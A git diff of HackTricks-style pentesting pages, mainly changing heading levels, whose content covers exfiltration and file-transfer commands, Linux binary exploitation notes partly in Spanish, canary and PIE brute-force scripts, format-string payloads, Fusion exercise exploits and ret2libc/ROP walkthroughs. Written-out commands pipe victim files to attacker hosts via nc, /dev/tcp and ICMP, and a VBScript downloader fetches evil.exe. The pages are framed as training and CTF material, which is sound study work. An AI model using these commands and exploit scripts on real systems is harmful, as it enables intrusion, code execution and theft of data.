@ -159,7 +157,7 @@ echo bye >> ftp.txt
ftp -n -v -s:ftp.txt ftp -n -v -s:ftp.txt
``` ```
## SMB # SMB
Kali as server Kali as server
@ -197,7 +195,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
WindPS-2> cd new_disk: WindPS-2> cd new_disk:
``` ```
## SCP # SCP
The attacker has to have SSHd running. The attacker has to have SSHd running.
@ -205,23 +203,23 @@ The attacker has to have SSHd running.
scp <username>@<Attacker_IP>:<directory>/<filename> scp <username>@<Attacker_IP>:<directory>/<filename>
``` ```
## NC # NC
```bash ```bash
nc -lvnp 4444 > new_file nc -lvnp 4444 > new_file
nc -vn <IP> 4444 < exfil_file nc -vn <IP> 4444 < exfil_file
``` ```
## /dev/tcp # /dev/tcp
### Download file from victim ## Download file from victim
```bash ```bash
nc -lvnp 80 > file #Inside attacker nc -lvnp 80 > file #Inside attacker
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
``` ```
### Upload file to victim ## Upload file to victim
```bash ```bash
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
@ -232,7 +230,7 @@ cat <&6 > file.txt
thanks to **@BinaryShadow\_** thanks to **@BinaryShadow\_**
## **ICMP** # **ICMP**
```bash ```bash
#In order to exfiltrate the content of a file via pings you can do: #In order to exfiltrate the content of a file via pings you can do:
@ -252,7 +250,7 @@ def process_packet(pkt):
sniff(iface="tun0", prn=process_packet) sniff(iface="tun0", prn=process_packet)
``` ```
## **SMTP** # **SMTP**
If you can send data to an SMTP server, you can create a SMTP to receive the data with python: If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
@ -260,7 +258,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
sudo python -m smtpd -n -c DebuggingServer :25 sudo python -m smtpd -n -c DebuggingServer :25
``` ```
## TFTP # TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation) By default in XP and 2003 (in others it need to be explicitly added during installation)
@ -286,7 +284,7 @@ In **victim**, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe tftp -i <KALI-IP> get nc.exe
``` ```
## PHP # PHP
Download a file with a PHP oneliner: Download a file with a PHP oneliner:
@ -294,13 +292,13 @@ Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
``` ```
## VBScript # VBScript
```bash ```bash
Attacker> python -m SimpleHTTPServer 80 Attacker> python -m SimpleHTTPServer 80
``` ```
#### Victim ### Victim
```bash ```bash
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo strUrl = WScript.Arguments.Item(0) > wget.vbs
@ -334,7 +332,7 @@ echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
``` ```
## Debug.exe # Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`. This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
@ -352,7 +350,7 @@ wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
## DNS # DNS
[https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)

View file

@ -16,9 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Linux Exploiting (Basic) (SPA)
### **ASLR** # **ASLR**
Aleatorización de direcciones Aleatorización de direcciones
@ -63,7 +62,7 @@ int i = 5;
**Sección STACK**: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…) **Sección STACK**: La pila (Argumentos pasados, cadenas de entorno (env), variables locales…)
### **1.STACK OVERFLOWS** # **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing > buffer overflow, buffer overrun, stack overrun, stack smashing
@ -75,15 +74,15 @@ Para obtener la dirección de una función dentro de un programa se puede hacer:
objdump -d ./PROGRAMA | grep FUNCION objdump -d ./PROGRAMA | grep FUNCION
``` ```
### ROP # ROP
#### Call to sys\_execve ## Call to sys\_execve
{% content-ref url="rop-syscall-execv.md" %} {% content-ref url="rop-syscall-execv.md" %}
[rop-syscall-execv.md](rop-syscall-execv.md) [rop-syscall-execv.md](rop-syscall-execv.md)
{% endcontent-ref %} {% endcontent-ref %}
### **2.SHELLCODE** # **2.SHELLCODE**
Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_” Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h | grep “\_\_NR\_”
@ -219,7 +218,7 @@ En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la d
**Off-by-One Exploit**\ **Off-by-One Exploit**\
Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP. Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP.
### **4. Métodos return to Libc** # **4. Métodos return to Libc**
Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar. Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar.
@ -277,7 +276,7 @@ Esta shellcode se puede repetir indefinidamente en las partes de memoria a las q
(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib) (Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib)
### **5.Métodos complementarios** # **5.Métodos complementarios**
**Ret2Ret** **Ret2Ret**
@ -370,7 +369,7 @@ Este tipo de overflows no busca lograr escribir algo en el proceso del programa,
No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante. No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante.
### **Format Strings** # **Format Strings**
In C **`printf`** is function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text. In C **`printf`** is function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
@ -395,7 +394,7 @@ AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500 AAAA.%500\$08x —> Param at offset 500
``` ```
#### \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table) ## \*\*GOT (Global Offsets Table) / PLT (\*\*Procedure Linkage Table)
This is the table that contains the **address** to the **external functions** used by the program. This is the table that contains the **address** to the **external functions** used by the program.
@ -420,7 +419,7 @@ Then, the **next time** a call is performed to that address the **function** is
You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`** You can see the PLT addresses with **`objdump -j .plt -d ./vuln_binary`**
#### **Exploit Flow** ## **Exploit Flow**
As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in a executable section, but highly probable you won't be able to write a shellcode in a executable section.\ As explained before the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Ideally we could set the **address to a shellcode** located in a executable section, but highly probable you won't be able to write a shellcode in a executable section.\
So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**. So a different option is to **overwrite** a **function** that **receives** its **arguments** from the **user** and **point** it to the **`system`** **function**.
@ -442,7 +441,7 @@ HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\
\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` \`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\`
#### **Format String Exploit Template** ## **Format String Exploit Template**
You an find a **template** to exploit the GOT using format-strings here: You an find a **template** to exploit the GOT using format-strings here:
@ -450,7 +449,7 @@ You an find a **template** to exploit the GOT using format-strings here:
[format-strings-template.md](format-strings-template.md) [format-strings-template.md](format-strings-template.md)
{% endcontent-ref %} {% endcontent-ref %}
#### **.fini\_array** ## **.fini\_array**
Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**. Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
@ -467,7 +466,7 @@ Contents of section .fini_array:
Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln. Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln.
#### **Format Strings to Dump Content** ## **Format Strings to Dump Content**
A format string can also be abused to **dump content** from the memory of the program.\ A format string can also be abused to **dump content** from the memory of the program.\
For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**: For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**:
@ -486,7 +485,7 @@ So, **accessing** the **8th parameter** you can get the flag:
Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**! Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**!
#### **DTOR** ## **DTOR**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays is very **weird to find a binary with a dtor section**. Nowadays is very **weird to find a binary with a dtor section**.
@ -503,12 +502,12 @@ rabin -s /exec | grep “__DTOR”
Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it. Usually you will find the **DTOR** section **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it.
#### **Format Strings to Buffer Overflows** ## **Format Strings to Buffer Overflows**
Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\ Tthe **sprintf moves** a formatted string **to** a **variable.** Therefore, you could abuse the **formatting** of a string to cause a **buffer overflow in the variable** where the content is copied to.\
For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow. For example, the payload `%.44xAAAA` will **write 44B+"AAAA" in the variable**, which may cause a buffer overflow.
#### **\_\_atexit Structures** ## **\_\_atexit Structures**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays is very **weird to exploit this**. Nowadays is very **weird to exploit this**.
@ -519,7 +518,7 @@ If you can **modify** the **address** of any of these **functions** to point to
Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\ Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64\_86**.\
The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector. The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector.
#### **setjmp() & longjmp()** ## **setjmp() & longjmp()**
{% hint style="danger" %} {% hint style="danger" %}
Nowadays is very **weird to exploit this**. Nowadays is very **weird to exploit this**.
@ -538,7 +537,7 @@ Each class has a **Vtable** which is an array of **pointers to methods**.
Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode. Each object of a **class** has a **VPtr** which is a **pointer** to the arrayof its class. The VPtr is part of the header of each object, so if an **overwrite** of the **VPtr** is achieved it could be **modified** to **point** to a dummy method so that executing a function would go to the shellcode.
### **Medidas preventivas y evasiones** # **Medidas preventivas y evasiones**
**ASLR no tan aleatorio** **ASLR no tan aleatorio**
@ -592,7 +591,7 @@ Si se usa la función execve() después de fork(), se sobreescribe el espacio y
**Relocation Read-Only (RELRO)** **Relocation Read-Only (RELRO)**
#### Relro ## Relro
**Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro. **Relro (Read only Relocation)** affects the memory permissions similar to NX. The difference is whereas with NX it makes the stack executable, RELRO makes **certain things read only** so we **can't write** to them. The most common way I've seen this be an obstacle is preventing us from doing a **`got` table overwrite**, which will be covered later. The `got` table holds addresses for libc functions so that the binary knows what the addresses are and can call them. Let's see what the memory permissions look like for a `got` table entry for a binary with and without relro.
@ -744,7 +743,7 @@ Memcheck\
RAD (Return Address Defender)\ RAD (Return Address Defender)\
Insure++ Insure++
### **8 Heap Overflows: Exploits básicos** # **8 Heap Overflows: Exploits básicos**
**Trozo asignado** **Trozo asignado**
@ -863,7 +862,7 @@ En caso de querer volver a usar uno se asignaría sin problemas. En caso de quer
Un puntero previamente liberado es usado de nuevo sin control. Un puntero previamente liberado es usado de nuevo sin control.
### **8 Heap Overflows: Exploits avanzados** # **8 Heap Overflows: Exploits avanzados**
Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la función unlink(). Las técnicas de Unlink() y FrontLink() fueron eliminadas al modificar la función unlink().
@ -1079,12 +1078,12 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
**objdump -p -/exec**\ **objdump -p -/exec**\
**Info functions strncmp —>** Info de la función en gdb **Info functions strncmp —>** Info de la función en gdb
### Interesting courses # Interesting courses
* [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io) * [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io)
* [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE) * [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE)
### **References** # **References**
* [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html) * [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Bypassing Canary & PIE
**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** **If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**
![](<../../.gitbook/assets/image (144).png>) ![](<../../.gitbook/assets/image (144).png>)
@ -28,13 +26,13 @@ Note that **`checksec`** might not find that a binary is protected by a canary i
However, you can manually notice this if you find that a value is saved in the stack at the begging of a function call and this value is checked before exiting. However, you can manually notice this if you find that a value is saved in the stack at the begging of a function call and this value is checked before exiting.
{% endhint %} {% endhint %}
## Brute force Canary # Brute force Canary
The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**. The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**.
Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**): Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**):
### Example 1 ## Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits. This example is implemented for 64bits but could be easily implemented for 32 bits.
@ -77,7 +75,7 @@ base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
``` ```
### Example 2 ## Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\ This is implemented for 32 bits, but this could be easily changed to 64bits.\
Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload. Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload.
@ -123,7 +121,7 @@ canary = breakCanary()
log.info(f"The canary is: {canary}") log.info(f"The canary is: {canary}")
``` ```
## Print Canary # Print Canary
Another way to bypass the canary is to **print it**.\ Another way to bypass the canary is to **print it**.\
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\ Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
@ -133,7 +131,7 @@ With this info the attacker can **craft and send a new attack** knowing the cana
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\ Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
## PIE # PIE
In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
@ -149,7 +147,7 @@ base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
``` ```
### Get base address ## Get base address
The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.

View file

@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Format Strings Template
```python ```python
from pwn import * from pwn import *
from time import sleep from time import sleep
#################### ###################
#### CONNECTION #### ### CONNECTION ####
#################### ###################
# Define how you want to exploit the binary # Define how you want to exploit the binary
LOCAL = True LOCAL = True
@ -72,9 +70,9 @@ def connect_binary():
ROP_LOADED = ROP(elf)# Find ROP gadgets ROP_LOADED = ROP(elf)# Find ROP gadgets
######################################## #######################################
#### Get format string configuration ### ### Get format string configuration ###
######################################## #######################################
def send_payload(payload): def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Fusion # Level00
## Level00
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
@ -52,7 +50,7 @@ r.send(buf)
r.interactive() r.interactive()
``` ```
## Level01 # Level01
```python ```python
from pwn import * from pwn import *

View file

@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Ret2Lib
**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.** **If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
## If you are **inside** the **host** # If you are **inside** the **host**
### You can find the **address of lib**c ## You can find the **address of lib**c
```bash ```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
@ -35,19 +33,19 @@ If you want to check if the ASLR is changing the address of libc you can do:
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
``` ```
### Get offset of system function ## Get offset of system function
```bash ```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
``` ```
### Get offset of "/bin/sh" ## Get offset of "/bin/sh"
```bash ```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
``` ```
### /proc/\<PID>/maps ## /proc/\<PID>/maps
If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root). If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
@ -57,7 +55,7 @@ Here you can find **exactly where is the libc loaded** inside the process and **
In this case it is loaded in **0xb75dc000** (This will be the base address of libc) In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
### Using gdb-peda ## Using gdb-peda
Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda: Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
@ -67,7 +65,7 @@ p exit
find "/bin/sh" find "/bin/sh"
``` ```
## Bypassing ASLR # Bypassing ASLR
You can try to bruteforce the abse address of libc. You can try to bruteforce the abse address of libc.
@ -75,7 +73,7 @@ You can try to bruteforce the abse address of libc.
for off in range(0xb7000000, 0xb8000000, 0x1000): for off in range(0xb7000000, 0xb8000000, 0x1000):
``` ```
## Code # Code
```python ```python
from pwn import * from pwn import *

View file

@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# ROP - Leaking LIBC address # Quick Resume
## Quick Resume
1. **Find** overflow **offset** 1. **Find** overflow **offset**
2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets 2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me)) 3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
4. With the library, **calculate the ROP and exploit it** 4. With the library, **calculate the ROP and exploit it**
## Other tutorials and binaries to practice # Other tutorials and binaries to practice
This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html) Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
## Code # Code
Filename: `vuln.c` Filename: `vuln.c`
@ -51,7 +49,7 @@ int main() {
gcc -o vuln vuln.c -fno-stack-protector -no-pie gcc -o vuln vuln.c -fno-stack-protector -no-pie
``` ```
## ROP - Leaking LIBC template # ROP - Leaking LIBC template
I'm going to use the code located here to make the exploit.\ I'm going to use the code located here to make the exploit.\
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script: Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
@ -60,14 +58,14 @@ Download the exploit and place it in the same directory as the vulnerable binary
[rop-leaking-libc-template.md](rop-leaking-libc-template.md) [rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %} {% endcontent-ref %}
## 1- Finding the offset # 1- Finding the offset
The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`): The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`):
```bash ```bash
#################### ###################
#### Find offset ### ### Find offset ###
#################### ###################
OFFSET = ""#"A"*72 OFFSET = ""#"A"*72
if OFFSET == "": if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue gdb.attach(p.pid, "c") #Attach and continue
@ -93,7 +91,7 @@ After finding the offset (in this case 40) change the OFFSET variable inside the
Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF. Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
## 2- Finding Gadgets # 2- Finding Gadgets
Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**. Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
@ -114,7 +112,7 @@ The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
In this step you don't need to execute anything as everything will be found by pwntools during the execution. In this step you don't need to execute anything as everything will be found by pwntools during the execution.
## 3- Finding LIBC library # 3- Finding LIBC library
Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address. Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
@ -165,14 +163,14 @@ This way we have **tricked puts function** to **print** out the **address** in *
As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\ As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
But, in a remote exploit case I will explain here how can you find it: But, in a remote exploit case I will explain here how can you find it:
### 3.1- Searching for libc version (1) ## 3.1- Searching for libc version (1)
You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\ You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
It will also allow you to download the discovered version of **libc** It will also allow you to download the discovered version of **libc**
![](<../../../.gitbook/assets/image (142).png>) ![](<../../../.gitbook/assets/image (142).png>)
### 3.2- Searching for libc version (2) ## 3.2- Searching for libc version (2)
You can also do: You can also do:
@ -207,7 +205,7 @@ Getting libc6_2.23-0ubuntu10_amd64
Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory. Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
### 3.3- Other functions to leak ## 3.3- Other functions to leak
```python ```python
puts puts
@ -217,7 +215,7 @@ read
gets gets
``` ```
## 4- Finding based libc address & exploiting # 4- Finding based libc address & exploiting
At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6` At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
